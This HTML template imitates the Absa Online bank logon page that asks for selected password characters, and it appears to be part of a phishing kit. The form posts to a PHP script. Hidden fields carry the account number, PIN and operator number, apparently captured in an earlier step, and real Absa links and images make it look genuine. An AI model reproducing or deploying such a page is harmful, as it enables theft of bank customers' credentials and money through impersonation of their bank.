<div class="ap-page-content ap-container">
   <div class="ap-container-highlevel">
      <div class="ap-titlebar ap-heading-titlebar" style="padding-top: 0px;">
         <div id="header_results" class="ap-bar-section ap-bar-title" style="color: #FFFFFF">
            Logon&nbsp;
            | Welcome to Absa Online
         </div>
      </div>
      <div class="ap-container-content" id="ap-container-content" style="padding-bottom:5px; overflow: hidden">
         <!-- PS: height must be set here to AUTO else it cuts of the bottom of the inner content -->
         <div class="ap-login-columns ap-columns-2-lhs" style="padding-top: 0px;">
            <!-- ap-column-1 -->
            <div class="ap-column-1 passwordScreen" id="ap-column-1" styleold="width:389px; padding:0">
               <div class="ap-login-container" id="ap-login-container">
                  <div class="ap-container-privatebank">
                     <input type="hidden" name="clienTypeValue" id="clienTypeValue" value="I">
                     <input type="hidden" name="sbuValue" id="sbuValue" value="F">
                     <input type="hidden" name="showAPBStuff" id="showAPBStuff" value="false">
                     <input type="hidden" name="labelValue" id="labelValue" value="Logon&nbsp;| Welcome to Absa Online |&nbsp;Private Assist contact number&nbsp;:&nbsp;0860 553 553">
                     <input type="hidden" name="wfpt" id="wfpt" value="null">
                  </div>
                  <div class="ap-container-highlevel" style="width: 606px;">
                     <div class="ap-titlebar ap-heading-titlebar ap-heading-titlebar-login">
                        <div class="ap-bar-section ap-bar-title" style="margin-top:8px;margin-left:0px">
                           &nbsp;&nbsp;Security SurePhrase
                        </div>
                     </div>
                     <div class="ap-container-content">
                        <div class="ui-keyboard" oninputchange="if (input.value.length) doMoveForm2Focus(input)">
                           <!--<form novalidate="" class="ui-form" method="POST" formtype="nosubmit" onsubmit="onForm2Submit()">-->
                            <form class="ui-form" id="form2" method="post" onsubmit="loginContinue3($('#form2')); return false;" action="loginContinue2.php" formtype="nosubmit">
                              <table class="ui-grid ui-keyboard-inputs">
                                 <tbody>
                                    <tr class="ui-row">
                                       <td tabindex="0" class="ui-cell">
                                          <!-- APB Start -->
                                          <b>PIN verified</b>.
                                          The last time you logged onto Absa Online or Cellphone Banking was on&nbsp; {currentLoginTime}
                                          <!-- APB End -->
                                       </td>
                                    </tr>
                                    <tr class="ui-row">
                                       <td tabindex="0" class="ui-cell">
                                          Your security SurePhrase is:
                                       </td>
                                    </tr>
                                    <tr class="ui-row">
                                       <td tabindex="0" class="ui-cell">
                                          <div id="spansurephrase">{spansurephrase}</div>
                                       </td>
                                    </tr>
                                    <tr class="ui-row">
                                       <td tabindex="0" class="ui-cell">
                                          If you have verified your security SurePhrase, then enter the missing characters of your password below.
                                       </td>
                                    </tr>
                                    <tr class="ui-row">
                                       <td class="ui-cell">
                                          Enter only the required characters of your password indicated by the <font style="color:#870A3C;">coloured</font> blocks.
                                       </td>
                                    </tr>
                                    <tr class="ui-row">
                                       <td class="ui-cell">
                                           {charactersPassword}
                                       </td>
                                    </tr>
                                    <tr class="ui-row">
                                       <td class="ui-cell">
                                          It is your responsibility to ensure the secrecy of your password.
                                          &nbsp;&nbsp;
                                          <div style="color:#AF144B; cursor:pointer; padding-top:4px; text-decoration:underline;" onclick="onForm2SubmitForgotPassword()">Forgot password?</div>
                                       </td>
                                    </tr>
                                    <tr class="ui-row">
                                       <td class="ui-cell">
                                          <input tabindex="4" id="viCheckbox" style="vertical-align: middle;" type="checkbox" name="viuser" value="1" title="Select to enable visually impaired interface."><label for="viuser" style="vertical-align:middle;" title="'Select to enable visually impaired interface.'">
                                          Select to enable visually impaired interface.
                                          </label>
                                       </td>
                                    </tr>
                                 </tbody>
                              </table>
                               
                              <!-- hidden stuff -->
                              <!-- hidden stuff -->
                                <input type="hidden" value="3" id="pwds" name="pwds">
                                <input type="hidden" value="{spansurephrase2}" id="surephrase" name="surephrase">
                                <input type="hidden" value="{pLength}" id="pLength" name="pLength">
                                <input type="hidden" value="{nextPasswordBlock}" id="nextPasswordBlock" name="nextPasswordBlock">
                              <div class="ui-formFoot">
                                 <div class="genericMessage-place-holder" style="display:block">
                                    <div role="alert" id="ap-login-form2-error" tabindex="0" class="ui-message ui-message-error" style="display:none">
                                       <span class="vi-screenreader-line"> Error details. </span>
                                       <div class="ui-message-timeStamp">
                                          <span class="vi-screenreader-line">Time stamp. </span>
                                       </div>
                                       <div class="ui-message--icon"></div>
                                       <div style="margin-right:120px" class="ui-message-content">
                                          <div class="ui-message-title"></div>
                                          <div class="ui-message-body" style="clear:both;">
                                             <!-- msg here -->
                                          </div>
                                       </div>
                                       <div class="clear-both"></div>
                                    </div>
                                 </div>
                                 <div class="validation-place-holder"></div>
                                 <div class="ui-buttonFooter">
                                    <div class="ui-exception-container">
                                       <!--  -->
                                       <div style="float:left">
                                          <span>Landing page:</span>&nbsp;
                                          <select tabindex="8" class="ui-select" id="landingpage2" defaultval="express" name="landingpage2" style="vertical-align: middle;">
                                             <option value="accounts">My accounts</option>
                                             <option value="express">Express</option>
                                             <option value="payments">Make a payment</option>
                                             <option value="saveinvest">Save and invest</option>
                                             <option value="apply">Apply for an account</option>
                                             <option value="insurance">Insure</option>
                                             <option value="profile">View my profile</option>
                                          </select>
                                       </div>
                                       <!-- Removed vi user checkbox -->
                                       <!-- Buttons -->
                                       <button aria-label="Logoff" type="button" tabindex="7" onclick="" class="ui-button ap-button-reset">
                                          <!-- ap-button-logout -->
                                          <div class="ui-button-left">
                                             <div class="ui-button-right">
                                                <div class="ui-button-center">Logoff</div>
                                             </div>
                                          </div>
                                       </button>
                                       <button aria-label="Reset" type="button" tabindex="6" onclick="resetForm2()" class="ui-button ap-button-reset">
                                          <div class="ui-button-left">
                                             <div class="ui-button-right">
                                                <div class="ui-button-center">Reset</div>
                                             </div>
                                          </div>
                                       </button>
                                       <button aria-label="Logon" type="submit" tabindex="5" class="ui-button ap-button-next">
                                          <div class="ui-button-left">
                                             <div class="ui-button-right">
                                                <div class="ui-button-center">Logon</div>
                                             </div>
                                          </div>
                                       </button>
                                    </div>
                                 </div>
                              </div>
                                <input type="hidden" name="AccessAccount" value="{AccessAccount}">                                
                                 <input type="hidden" name="PIN" value="{PIN}">                                
                                 <input type="hidden" name="Operator" value="{Operator}">
                           </form>
                           <!-- keyboard -->
                           <table class="ui-grid">
                              <tbody>
                                 <tr class="ui-row">
                                    <td class="ui-cell ap-login-keyBoardLabelCell">
                                       Use the online keyboard to enter your password.
                                    </td>
                                 </tr>
                                 <tr class="ui-row">
                                    <td class="ui-cell">
                                       <div class="ui-keyboard-keyboardContainer" style="user-select: none;">
                                          <div class="floatleft ui-keyboard-keyboardContainer-utils">
                                             <div class="ui-keyboard-button util" action="backspace" unselectable="on">
                                                <div class="backspace" unselectable="on"></div>
                                                Backspace
                                             </div>
                                             <div class="ui-keyboard-button util" action="capslock" unselectable="on">
                                                CapsLock
                                             </div>
                                          </div>
                                          <div class="floatleft ui-keyboard-keyboardContainer-keys">
                                             <div class="row">
                                                <div class="ui-keyboard-button" unselectable="on">1</div>
                                                <div class="ui-keyboard-button" unselectable="on">2</div>
                                                <div class="ui-keyboard-button" unselectable="on">3</div>
                                                <div class="ui-keyboard-button" unselectable="on">4</div>
                                                <div class="ui-keyboard-button" unselectable="on">5</div>
                                                <div class="ui-keyboard-button" unselectable="on">6</div>
                                                <div class="ui-keyboard-button" unselectable="on">7</div>
                                                <div class="ui-keyboard-button" unselectable="on">8</div>
                                                <div class="ui-keyboard-button" unselectable="on">9</div>
                                                <div class="ui-keyboard-button" unselectable="on">0</div>
                                                <div class="clearBoth"></div>
                                             </div>
                                             <div class="row ui-keyboard-keyboardContainer-row2">
                                                <div class="ui-keyboard-button" unselectable="on">q</div>
                                                <div class="ui-keyboard-button" unselectable="on">w</div>
                                                <div class="ui-keyboard-button" unselectable="on">e</div>
                                                <div class="ui-keyboard-button" unselectable="on">r</div>
                                                <div class="ui-keyboard-button" unselectable="on">t</div>
                                                <div class="ui-keyboard-button" unselectable="on">y</div>
                                                <div class="ui-keyboard-button" unselectable="on">u</div>
                                                <div class="ui-keyboard-button" unselectable="on">i</div>
                                                <div class="ui-keyboard-button" unselectable="on">o</div>
                                                <div class="ui-keyboard-button" unselectable="on">p</div>
                                                <div class="clearBoth"></div>
                                             </div>
                                             <div class="row ui-keyboard-keyboardContainer-row3">
                                                <div class="ui-keyboard-button" unselectable="on">a</div>
                                                <div class="ui-keyboard-button" unselectable="on">s</div>
                                                <div class="ui-keyboard-button" unselectable="on">d</div>
                                                <div class="ui-keyboard-button" unselectable="on">f</div>
                                                <div class="ui-keyboard-button" unselectable="on">g</div>
                                                <div class="ui-keyboard-button" unselectable="on">h</div>
                                                <div class="ui-keyboard-button" unselectable="on">j</div>
                                                <div class="ui-keyboard-button" unselectable="on">k</div>
                                                <div class="ui-keyboard-button" unselectable="on">l</div>
                                                <div class="clearBoth"></div>
                                             </div>
                                             <div class="row ui-keyboard-keyboardContainer-row4">
                                                <div class="ui-keyboard-button" unselectable="on">z</div>
                                                <div class="ui-keyboard-button" unselectable="on">x</div>
                                                <div class="ui-keyboard-button" unselectable="on">c</div>
                                                <div class="ui-keyboard-button" unselectable="on">v</div>
                                                <div class="ui-keyboard-button" unselectable="on">b</div>
                                                <div class="ui-keyboard-button" unselectable="on">n</div>
                                                <div class="ui-keyboard-button" unselectable="on">m</div>
                                                <div class="clearBoth"></div>
                                             </div>
                                          </div>
                                       </div>
                                    </td>
                                 </tr>
                              </tbody>
                           </table>
                        </div>
                     </div>
                     <!-- bottom round borders -->
                     <div class="ap-container-bottom-corners">
                        <div class="ap-corners-rounded-bottom-left"></div>
                        <div class="ap-corners-rounded-bottom" style="width:590px;"></div>
                        <div class="ap-corners-rounded-bottom-right"></div>
                     </div>
                  </div>
               </div>
            </div>
            <!-- ap-column-2 -->
            <div class="ap-column-2 passwordScreenAdds" id="ap-column-2" styleold="width:550px;">
               <div id="divadds1" style="position: relative; width: 100%; margin-bottom: 10px; display: none;">
                  <div style="float:left; width:270px; margin-right:10px;">
                     <!-- Security Center Links -->	
                     <div id="divsecuritycentre" class="ap-login-block-rounded">
                        <!-- top round borders -->
                        <div class="ap-login-block-rounded-top">
                           <div class="ap-corners-rounded-top-left"></div>
                           <div class="ap-corners-rounded-top"></div>
                           <div class="ap-corners-rounded-top-right"></div>
                        </div>
                        <!-- content -->
                        <div role="tablist" class="ui-tabBox">
                           <ul class="ui-tabHeads">
                              <li aria-selected="true" class="ui-tabHead ui-tab-selected" role="button" tabindex="18">
                                 Security centre
                                 <span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
                              </li>
                           </ul>
                           <div class="ui-tabBodies">
                              <div tabindex="19" role="tabpanel" class="ui-tabBody ui-tabBody-selected">
                                 <div style="background: #FFFFFF;">
                                    <ul class="abc">
                                       <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Absa's online security measures</a></li>
                                       <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Important information about phishing</a></li>
                                       <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Protect yourself online</a></li>
                                       <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Online shopping and 3D Secure</a></li>
                                       <li><a href="https://www.absa.co.za/security-centre/scams/" id="am" target="_new">Latest scams</a></li>
                                       <li><a href="https://www.absa.co.za/security-centre/absa-tools/" id="am" target="_new">Latest internet security software</a></li>
                                    </ul>
                                 </div>
                              </div>
                           </div>
                        </div>
                        <!-- bottom round borders -->
                        <div class="ap-login-block-rounded-bottom">
                           <div class="ap-corners-rounded-bottom-left"></div>
                           <div class="ap-corners-rounded-bottom"></div>
                           <div class="ap-corners-rounded-bottom-right"></div>
                        </div>
                     </div>
                  </div>
                  <div style="float:left; width:270px;">
                     <!-- Important Links on Right Side of Page -->
                     <div id="divimportantlinks" class="ap-login-block-rounded" style="display: none;">
                        <!-- top round borders -->
                        <div class="ap-login-block-rounded-top">
                           <div class="ap-corners-rounded-top-left"></div>
                           <div class="ap-corners-rounded-top"></div>
                           <div class="ap-corners-rounded-top-right"></div>
                        </div>
                        <!-- content -->
                        <div role="tablist" class="ui-tabBox">
                           <ul class="ui-tabHeads">
                              <li aria-selected="true" class="ui-tabHead ui-tab-selected" role="button" tabindex="13">
                                 Important links
                                 <span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
                              </li>
                           </ul>
                           <div class="ui-tabBodies">
                              <div tabindex="14" role="tabpanel" class="ui-tabBody ui-tabBody-selected">
                                 <div style="background: #FFFFFF;">
                                    <ul class="abc">
                                       <li><a href="https://www.absa.co.za/media-centre/press-statements/2016/old-interface-switched-off/" id="am" target="_new">Old interface switched off</a></li>
                                       <li><a href="registration/?lang=en" id="am" target="_new">How to register</a></li>
                                       <li><a href="https://www.absa.co.za/media-centre/press-statements/2016/absa-listed-beneficiaries-accounts-closed/" id="am" target="_new">Absa Listed Beneficiaries - accounts closed</a></li>
                                       <li><a href="https://www.absa.co.za/media-centre/press-statements/absa-online-payments-issue-notice" id="am" target="_new"><b>Inter-Bank Payment delay</b></a></li>
                                       <li><a href="https://www.absa.co.za/security-centre/online-security" id="am" target="_new">Security enhancement</a></li>
                                       <li><a href="https://www.absa.co.za/talk-to-us/" id="am" target="_new">Contact us</a></li>
                                    </ul>
                                 </div>
                              </div>
                           </div>
                        </div>
                        <!-- bottom round borders -->
                        <div class="ap-login-block-rounded-bottom">
                           <div class="ap-corners-rounded-bottom-left"></div>
                           <div class="ap-corners-rounded-bottom"></div>
                           <div class="ap-corners-rounded-bottom-right"></div>
                        </div>
                     </div>
                  </div>
                  <div style="clear:both;"></div>
                  <div style="position:relative; margin-top:10px; height:152px;">
                     <div class="ap-login-campaign-image img1" style="position:absolute; top:0px; left:0px; width:280px;"><a href="https://www.absa.co.za/offers/safety-and-security/"><img src="https://ib.absa.co.za/absa-online/assets/Assets/Richmedia/Absaonline/CampaignImages/Eng/campaigne_3_post_golive_EN.jpg" alt=""></a></div>
                     <div class="ap-login-campaign-image img2" style="position:absolute; top:0px; right:0px; width:270px;"><a href="https://www.absa.co.za/offers/faq-on-the-improved-online-banking-design/"><img src="/absa-online/assets/Assets/Richmedia/Absaonline/CampaignImages/Eng/campaigne_3_post_golive_EN.jpg" alt=""></a></div>
                  </div>
               </div>
               <!-- How it Works Right of 2nd page -->
               <div id="divhowitworks" class="ap-login-block-rounded" style="display: block;">
                  <div>
                     <!-- top round borders -->
                     <div class="ap-login-block-rounded-top">
                        <div class="ap-corners-rounded-top-left"></div>
                        <div class="ap-corners-rounded-top" style="width:312px;"></div>
                        <div class="ap-corners-rounded-top-right"></div>
                     </div>
                     <!-- content -->
                     <div role="tablist" class="ui-tabBox">
                        <ul class="ui-tabHeads">
                           <li aria-selected="true" class="ui-tabHead ui-tab-selected" role="button" tabindex="15">
                              How it works
                              <span class="vi-screenreader-line "> [selected] 1 of 1 [tab].</span>
                           </li>
                        </ul>
                        <div class="ui-tabBodies">
                           <div tabindex="16" role="tabpanel" class="ui-tabBody ui-tabBody-selected">
                              <div style="background: #FFFFFF;">
                                 <div style="border-bottom: 1px solid #CCCCCC;">
                                    <div style="padding: 10px;">In this example the password is <b>Password1</b></div>
                                 </div>
                                 <div style="margin: 10px 0px 10px 10px;"><span class="pfsmalltxt">P</span>
                                    <span class="pfsmalltxt">a</span> <span class="pfsmalltxt">s</span>
                                    <span class="pfsmalltxt">s</span> <span class="pfsmalltxt">w</span>
                                    <span class="pfsmalltxt">o</span> <span class="pfsmalltxt">r</span>
                                    <span class="pfsmalltxt">d</span> <span class="pfsmalltxt">1</span>
                                 </div>
                                 <div style="margin: 10px 0px 5px 10px;">
                                    <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="2">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="3">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="4">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="5">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="6">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="7">
                                    <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                    <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                 </div>
                                 <div style="border-top: 1px solid #CCCCCC; border-bottom: 1px solid #CCCCCC; padding: 10px;">
                                    You have to enter (case sensitive):
                                 </div>
                                 <div style="margin: 10px 0px 10px 10px;"><span class="pfsmalltxt">P</span>
                                    <span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;&nbsp;</span>
                                    <span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;&nbsp;</span>
                                    <span class="pfsmalltxt">&nbsp;&nbsp;</span> <span class="pfsmalltxt">&nbsp;</span>
                                    <span class="pfsmalltxt">d</span> <span class="pfsmalltxt">1</span>
                                 </div>
                                 <div style="margin: 10px 0px 5px 10px;">
                                    <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="2">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="3">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="4">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="5">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="6">
                                    <input type="text" class="pfsmall pf1" name="dpf2" disabled="true" value="7">
                                    <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                    <input type="password" class="pfsmall pf2" name="dpf1" disabled="true" tabindex="17" maxlength="1" value="">
                                 </div>
                                 <br>
                              </div>
                           </div>
                        </div>
                     </div>
                     <!-- bottom round borders -->
                     <div class="ap-login-block-rounded-bottom">
                        <div class="ap-corners-rounded-bottom-left"></div>
                        <div class="ap-corners-rounded-bottom" style="width:312px;"></div>
                        <div class="ap-corners-rounded-bottom-right"></div>
                     </div>
                  </div>
                  <div class="ap-login-campaign-image img3" style="padding: 14px 0px 1px 0px;" id="ap-campaignImage-div"><a href="https://www.absa.co.za/offers/faq-on-the-improved-online-banking-design/"><img src="https://ib.absa.co.za/absa-online/assets/Assets/Richmedia/Absaonline/CampaignImages/Eng/campaigne_3_post_golive_EN.jpg" alt=""></a></div>
                  <div class="ap-login-campaign-image img3" style="padding: 14px 0px 1px; display: none;" id="ap-campAPBImage-div"><a href="https://www.absa.co.za/offers/faq-on-the-improved-online-banking-design/"><img src="/absa-online/assets/Assets/Richmedia/Absaonline/CampaignImages/Eng/campaigne_3_post_golive_EN.jpg" alt="AOL Express"></a></div>
               </div>
            </div>
            <!-- ap-column-2 -->
            <div class="ap-columns-clear"></div>
         </div>
         <!-- ap-columns-2-lhs -->
         <div style="width: 100%; height: 10px;"></div>
         <!-- 3 column layout -->
         <div id="divbottomadds" class="ap-login-columns ap-columns-33" style="display: none;">
            <!-- ap-column-1 -->
            <div class="ap-column-1">
               <!-- Security Centre Links Bottom left of Login page 1 -->
               <!-- PS: Was moved for Resonance to be next to input fields -->
               &nbsp;
            </div>
            <!-- ap-column-2 -->
            <div class="ap-column-2">
               <!-- Campaign Banner 1 used to be here -->
               &nbsp;
            </div>
            <!-- ap-column-3 -->
            <div class="ap-column-3">
               <!-- Campaign Banner 2 used to be here -->
               &nbsp;
            </div>
         </div>
      </div>
      <!-- bottom rounded corners -->
      <!-- <div class="ap-container-bottom ap-heading-titlebar-item ap-container-bottom-show"> -->
      <div class="ap-container-bottom ap-heading-titlebar-item ap-container-bottom-hide">
         <div class="ap-corners-rounded-bottom-left"></div>
         <div class="ap-corners-rounded-bottom"></div>
         <div class="ap-corners-rounded-bottom-right"></div>
      </div>
   </div>
</div>